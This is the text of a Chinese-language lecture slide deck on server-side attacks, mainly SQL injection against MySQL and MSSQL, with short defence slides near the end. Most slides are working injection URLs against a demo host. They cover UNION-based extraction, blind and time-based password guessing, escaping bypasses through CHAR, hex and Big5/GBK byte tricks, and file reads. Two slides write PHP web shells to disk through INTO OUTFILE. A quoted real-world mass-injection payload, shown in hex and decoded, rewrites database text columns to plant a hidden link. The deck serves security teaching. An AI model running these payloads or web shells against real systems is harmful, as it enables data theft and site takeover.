Más contenido relacionado La actualidad más candente (17) Similar a 伺服器端攻擊與防禦I (20) 伺服器端攻擊與防禦I2. 1020307
伺服器端攻擊與防禦I - 大綱
• SQL Injection
– 攻擊技巧
• 判斷是否有弱點
• 常用函數
• UNION
• 繞過跳脫字元
– ASCII編碼
– 16進位
– 雙位元組跳脫技巧
– SQL Blind Injection
• Time-Based Blind SQL Injection
– SQL Column Truncation
3. SQL Injection – 簡介
• Rfp, “NT Web Technology Vulnerabilities”, Phrack, 1998
• 維京百科
– SQL攻擊(SQL injection,中國大陸稱作SQL注入攻擊),簡稱隱碼
攻擊,是發生於應用程式之資料庫層的安全漏洞。簡而言之,是在輸入
的字串之中夾帶SQL指令,在設計不良的程式當中忽略了檢查,那麼這
些夾帶進去的指令就會被資料庫伺服器誤認為是正常的SQL指令而執行,
因此遭到破壞。
6. SQL Injection攻擊技巧 – 簡易嘗試是否有弱點
• http://www.hackdemo.com/getUser.php?id=1
• http://www.hackdemo.com/getUser.php?id=
• http://www.hackdemo.com/getUser.php?id=999999.9
• http://www.hackdemo.com/getUser.php?id=1'
• http://www.hackdemo.com/getUser.php?id=1+and+1=1
• http://www.hackdemo.com/getUser.php?id=1+and+1=2
7. SQL Injection攻擊技巧 – 空格與註解
• 關鍵字大小寫混雜
• 註解
#(%23), /*, --
• 空格
+, /**/
URL編碼 用途
%09 horizontal tab
%0a line feed
%0b vertical tab
%0c form feed
%0d carriage return
%20 space
8. SQL Injection攻擊技巧 - 猜解資料常用函數
函數 功能
LENGTH(str) 返回字串長度
LEFT(str,len) 返回某字串開頭開始的len最左字串
RIGHT(str,len) 返回某字串開頭開始的len最右字串
SUBSTRING(str,pos,len) 取得某字串的子字串
SUBSTR(str,pos,len) 為SUBSTRING同義詞
MID(str,pos,len) 為SUBSTRING同義詞
CHAR(N,... [USING charset]) 其返回值為一個包含這些整數代碼值的字串
HEX(N_or_S) 如果N或S是一個數字,則返回16進位N的字串
ASCII(str) 返回值為字串str的最左邊數值
CONCAT(str1,str2,...) 返回值為所有連接參數產生的字串
NAME_CONST(name,value) 返回一個定值。當月來產生一個結果集合列時,
NAME_CONST()促使該列使用定義名稱
5.1後限制僅能使用CONST的變數
…
9. SQL Injection攻擊技巧 - 相關系統函數
函數 功能
LOAD_FILE(file_name) 讀取檔案
INTO OUTFILE '/var/www/html/back.php' 輸出檔案
VERSION() 返回MySQL伺服器版本
DATABASE() 目前使用資料庫名稱
USER() 返回目前MySQL用戶與主機名稱
SYSTEM_USER() 與USER()同義
SESSION_USER() 與USER()同義
SCHEMA() 與DATABASE()同義
CURRENT_USER() 返回當前被驗證的用戶名與主機名組合,可能與
USER()值有所不同
@@DATADIR 讀取資料庫路徑
@@BASEDIR 資料庫安裝路徑
…
10. SQL Injection攻擊技巧 – 讀檔注意事項
• 欲讀取文件必須在伺服器上
• 必須指定文件完整的路徑
• 必須有權限讀取並且文件必須完全可讀
• 欲讀取文件必須小於 max_allowed_packet
11. SQL Injection攻擊技巧 – UNION
• PHP+MySQL未支援多指令查詢,利用聯集查詢UNION
– 有弱點的SQL語法,沒有引號的參數(以PHP為例)
• SELECT * FROM `member` WHERE `id` =$id
– 沒有引號攻擊範例
• http://www.hackdemo.com/getUser.php?id=1+and+1=2+UNI
ON+SELECT+1,2,3,4#
– 實際執行語法
• SELECT * FROM `member` WHERE `id` =1 AND 1=2
UNION SELECT 1,2,3,4#
12. SQL Injection攻擊技巧 – UNION
• PHP+MySQL未支援多指令查詢,利用聯集查詢UNION
• 有弱點的SQL語法,有引號的參數(以PHP為例)
• SELECT * FROM `member` WHERE `name` like '" . $name .
"%'
• 沒有引號攻擊範例
• http://www.hackdemo.com/searchUser.php?name=h%'/**/a
nd/**/1=2/**/union/**/select/**/1,2,3,user()%23
• 實際執行語法
• SELECT * FROM `member` WHERE `name` like
'h%'/**/and/**/1=2/**/union/**/select/**/1,2,3,user()#%'
14. SQL Injection攻擊技巧 – 猜解資料
• 取得長度
– http://www.hackdemo.com/getUser.php?id=1+AND+LENGTH(PA
SSWORD)=1#
– …
– http://www.hackdemo.com/getUser.php?id=1+AND+LENGTH(PA
SSWORD)=7#
• 猜解資料
– http://www.hackdemo.com/getUser.php?id=1+AND+RIGHT(PAS
SWORD,1)='a'#
– …
– http://www.hackdemo.com/getUser.php?id=1+AND+RIGHT(PAS
SWORD,1)='w'#
15. SQL Injection攻擊技巧 – 讀寫檔案
• 讀資料寫檔案
– http://www.hackdemo.com/getUser.php?id=1+into+outfile+'D:/W
ebsite/www.hackdemo.com/member.txt'
• 寫後門
– http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNIO
N+SELECT+%22%3C?php+system($_GET['cmd']);?%3E%22,2,3,4+i
nto+outfile+'D:/Website/www.hackdemo.com/cmd.php'
17. SQL Blind Injection
• SQL盲注入(SQL Blind Injection),也是一種SQL Injection的類型。一般
SQL Injection仰賴出錯的相關訊息建構攻擊語法,而盲注入完全仰賴語法
執行的對(true)錯(false)
• SQL Blind Injection
– 一般盲注入
– Time-Based Blind SQL Injection
18. Time-Based Blind SQL Injection (1/2)
• 透過時間的延遲來判斷該SQL語法是否執行成功
• 技巧
– 內建函數
• BENCHMARK(COUNT, EXPR)
• SLEEP(seconds)
– MySQL >= 5
– 創建較花時間的語法(heavy queries)
20. Time-Based Blind SQL Injection - 透過時間
延遲猜解資料庫名稱
• http://www.hackdemo.com/getUserLash.php?id=1+UNION+SEL
ECT+IF(SUBSTRING(db,1,1)=CHAR(1),BENCHMARK(5000000,E
NCODE('ENCODE','5s')),NULL),2,3,4+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
• …
• http://www.hackdemo.com/getUserLash.php?id=1+UNION+SEL
ECT+IF(SUBSTRING(db,1,1)=CHAR(104),BENCHMARK(5000000,
ENCODE('ENCODE','5s')),NULL),2,3,4+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
21. SQL Injection攻擊技巧 - 繞過跳脫字元
• ACSII編碼
– ASCII(), CHAR()
– 單一
• CHAR(68)
– 多個
• CHAR(68, 58, 92)
• 16進位編碼
– HEX()
– 0x443A5C
• 雙位元組跳脫技巧
22. SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
• 猜解欄位
– http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNIO
N+SELECT+1,2,3,4+FROM+user--
– http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNIO
N+SELECT+1,2,3,4+FROM+member--
• 猜解欄位資料
– http://www.hackdemo.com/getUserLash.php?id=1+AND+RIGHT
(PASSWORD,1)=char(0)
– …
– http://www.hackdemo.com/getUserLash.php?id=1+AND+RIGHT
(PASSWORD,1)=char(119)
23. SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
• 讀資料寫檔案
– http://www.hackdemo.com/getUserLash.php?id=1+AND+1=
2+UNION+SELECT+1,2,3,load_file(char(68,58,92,87,101,98,
115,105,116,101,92,119,119,119,46,104,97,99,107,100,101
,109,111,46,99,111,109,92,103,101,116,85,115,101,114,46
,112,104,112))--
– http://www.hackdemo.com/getUserLash.php?id=1+AND+1=
2+UNION+SELECT+1,2,3,load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
24. SQL Injection攻擊技巧 – 寫檔案(無法繞過引號
限制)
1. 找到phpMyAdmin
2. 遠端MySQL
mysql> use xssdb;
mysql> set
@a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027;
mysql> prepare cmd from @a;
mysql> execute cmd;
@a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile 'C:/shell.php';
寫入檔案為
<?php @eval($_POST['cmd']);?>
25. SQL Injection攻擊技巧 - 雙位元組跳脫技巧
(1/3)
• 透過注入的編碼與反斜線/(%5c)重組產生:字',繞過跳脫字元的限制
• 情境
– 跳脫字元處理
• addslashes
• mysql_escape_string
• php.in
– magic_quotes_gpc 開啟
– 採用BIG5或GBK編碼
• set names gbk, set names big5
26. SQL Injection攻擊技巧 - 雙位元組跳脫技巧
(2/3)
• 中文語系文字以兩個位元組表示
– Big5:
• 高位元組: 0x81-0xFE;低位元組: 0x40-0x7E、0xA1-0xFE
– GBK :
• 前位元組: 0x81-0xFE;後位元組: 0x40-0x7E
– GB2312:
• 前位元組: 0xB0-0xF7;後位元組: 0xA0-0xFE
– 攻擊字元: %BF, %CC, %D5…
27. SQL Injection攻擊技巧 -雙位元組跳脫技巧 (3/3)
• 有引號的參數繞過跳脫
– http://www.hackdemo.com/searchUserLash.php?name=h%
%B5'+AND+1=2+UNION+SELECT+1,2,3,4%23
– http://www.hackdemo.com/searchUserLash.php?name=h%
%CC'+AND+1=2+UNION+SELECT+1,2,3,4%23
– http://www.hackdemo.com/searchUserLash.php?name=h%
%d5'+AND+1=2+UNION+SELECT+1,2,3,4%23
28. SQL Column Truncation – 簡介(1/3)
• MySQL中 SQL mode
– 沒有開啟 STRICT_ALL_TABLES
• 使用者新增超過長度的資料會出現警告提示
• 但資料還是會新增
– 開啟 STRICT_ALL_TABLES
• 使用者新增超過長度的資料會出現提示
• 出現ERROR 1406, 該資料不會成功新增
• 慘案
– 2008-09-07
• WordPress 2.6.1 SQL Column Truncation Vulnerability
30. SQL Column Truncation - 防禦方案(3/3)
• 在字串中不該有空白的主動清除
– 如帳號類資訊
• 在 SELECT 資料時加上 BINARY 參數
• 在 MySQL 設定預設以 BINARY 查詢
• 在 MySQL 開啟 STRICT_ALL_TABLES
– 超過欄位長度會出現 ERROR 而非出現 WARNING
– 新增資料為避免發生錯誤, 可能需在新增修改加入額外檢查
31. SQL Injection – 延伸思考
• INSERT 與 UPDATE 的攻擊可能發生嗎?
• NoSQL 沒有 SQL Injection?
• 其他攻擊利用
– Deep Blind Injection
– Error-Based Injection
• Duplicate Error
• Function
– information_schema
– 使用者自訂函數(User-Defined Functions)
– 觸發(Trigger)
33. 正確地防禦SQL Injection
• 最低權限原則
• 使用預先編譯敘述
• 使用預存函數
• 使用UTF8避免使用BIG5或GBK
• 檢查資料型態與強制轉型
– bool settype(mixed &$var, string $type)
– intval, doubleval...
• 使用安全函數
– OWASP ESAPI
• MySQLCodec
34. MSSQL實際案例 - 116jurist.ru自動化注入(1/4)
• 2012.12.xx 10:03:31
• Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(@s)--
35. MSSQL實際案例 - 116jurist.ru自動化注入(2/4)
• 2012.12.xx 10:03:33
• Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(@s)--
36. MSSQL實際案例 - 116jurist.ru自動化注入(3/4)
• 2012.12.xx 10:03:44
• Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(@s)--
37. MSSQL實際案例 - 116jurist.ru自動化注入解碼
(4/4)
• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE
in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and
t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=SUBSTRING(['+@C+'], 1, CHARINDEX(''</title><'',['+@C+']) - 1) where ['+@C+']
like ''%</title><%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
•
• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE
in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>20 and t.table_name=c.table_name and
t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN EXEC('ALTER TABLE ['+@T+'] ALTER COLUMN ['+@C+'] varchar(8000) NOT NULL') FETCH NEXT FROM Table_Cursor INTO
@T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
•
• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE
in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>80 and t.table_name=c.table_name and
t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN EXEC('UPDATE ['+@T+'] SET
['+@C+']=CONVERT(VARCHAR(8000),['+@C+'])+''</title><style>.a4tw{position:absolute;clip:rect(457px,auto,auto,457px);}<
/style><div class=a4tw><a href=http://116jurist.ru>þðèäè÷åñêèå-óñëóãè-ìîñêâà</a></div>'' ') FETCH NEXT FROM
Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
38. 參考資料
• 吳翰清, 網路竟然這麼危險(白帽子讲Web安全), 2012
• MySQL, String Functions, 5.1
• MySQL, Miscellaneous Functions, 5.1
• MySQL/PHP 对单引号转义时load_file/outfile 生成一句话
• Shazin Sadakath, Time Based SQL Injection using heavy queries in
MySQL
• Stefan Esser, MySQL and SQL Column Truncation Vulnerabilities, 2008